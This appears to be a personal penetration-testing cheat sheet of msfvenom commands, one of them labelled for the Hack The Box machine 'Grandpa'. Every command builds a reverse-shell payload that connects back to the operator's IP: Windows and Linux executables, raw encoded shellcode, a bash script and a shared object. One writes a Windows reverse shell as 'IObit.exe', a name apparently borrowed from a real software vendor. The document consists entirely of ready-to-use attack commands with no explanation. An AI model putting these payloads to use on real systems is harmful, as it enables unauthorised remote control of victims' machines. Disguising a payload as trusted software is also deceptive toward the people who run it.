# msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=1234 EXITFUNC=thread -b "\x00" -f python -v <name of variable if you want something else than buf>


msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f exe > IObit.exe

- htb grandpa
msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f raw -e x86/alpha_mixed


- linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f elf > rv


- linux bash
msfvenom -p cmd/unix/reverse_bash LHOST=$(iptun) LPORT=2222 -f raw > shell.sh


- linux x86 shared object
msfvenom -p linux/x86/shell_reverse_tcp LHOST=$(iptun) LPORT=23 EXITFUNC=thread -f elf-so > rv.so


- windows x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=445 -f exe > rv.exe